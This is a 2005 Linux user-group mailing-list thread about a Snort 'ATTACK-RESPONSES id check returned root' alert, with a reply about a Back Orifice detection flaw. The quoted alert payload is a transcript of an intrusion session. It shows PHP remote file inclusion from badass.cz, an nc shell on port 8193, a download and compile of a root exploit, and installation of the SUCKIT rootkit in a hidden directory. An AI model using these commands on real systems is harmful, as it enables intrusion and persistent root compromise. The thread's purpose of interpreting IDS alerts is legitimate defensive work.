[wplug] Need help with a snort alert. Did my box get hacked?
Jason Carr
jason at flacid.org
Fri Oct 21 15:40:29 EDT 2005
A little off topic, but please please make sure that your Snort isn't
running Back Orifice detection, there are reports about possibly making
a worm, which just makes people want to write the worms...
http://www.securityfocus.com/news/11349?ref=rss
- Jason
On Fri, 2005-10-21 at 09:12 -0400, Chris Romano wrote:
> I came in this moring and checked my snort alerts (morning routine),
> and noticed the following:
>
> ATTACK-RESPONSES id check returned root 2005-10-21 07:40:32
> 82.165.25.125:80 10.10.10.5:51949 TCP
>
> Some background. 10.10.10.x is my dmz and 10.10.10.5 is a
> firewall/proxy (Slack 10.1) that connects the 10.10.10.x to our
> 192.168.0.x internal network.
> So I started digging around. The alert logged the following:
>
> SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit *.*
> (c)oded by sd at sf.cz & devik at cdi.cz, 2001
> Configuring ./sk:.OK!.[attacker at badass.cz ~/sk10]$ telnet lamehost.com
> 80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character
> is '^]'..GET /bighole.php3?inc=http://badass.cz/egg.php3
> HTTP/1.1.Host: lamehost.com ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001
> 04:04:52 GMT.Server: Apache/1.3.14 (Unix) (Red-Hat/Linux)
> PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT.ET ag:
> "31c6-c2-3bb3ffba".Content-Type: text/html..IT WERKS! Shell
> at port 8193 Connection closed by foreign
> host..[attacker at badass.cz~/sk10]$ nc -v lamehost.com 8193.lamehost.com
> [192.168.0.2] 8193 (?) open.w.12:08am up 1:20, 3 users, load
> average: 0.05, 0.06,0.08.USER TTY FROM LOGIN at IDLE JCPU
> PCPU AT.root tty1 - 11:58pm 39:03 3.15s 2.95s
> bash.cd /tmp.lynx -dump http://badass.cz/s.c > s.c.gcc s.c o
> super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root) gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd .l33t.lynx -dump http://badass.cz/~attacker/sk10/s
> k > sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * * *
> * * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w
>
> Ok, there a few things that make me think that this is a false
> positive. First is the "192.160.0.02" IP. That is not on this
> network. Second, There is no host on 192.168.0.2. Third, I do not
> have any Red Hat machines. They are all Slackware. I am still
> concerned. I searched for "sk" and all I found are two directories
> related to vim and I didn't find a directory called "l33t".
>
> Can anyone me verify that I wasn't hacked?
>
> Thanks,
> Chris
> _______________________________________________
> wplug mailing list
> wplug at wplug.org
> http://www.wplug.org/mailman/listinfo/wplug
More information about the wplug
mailing list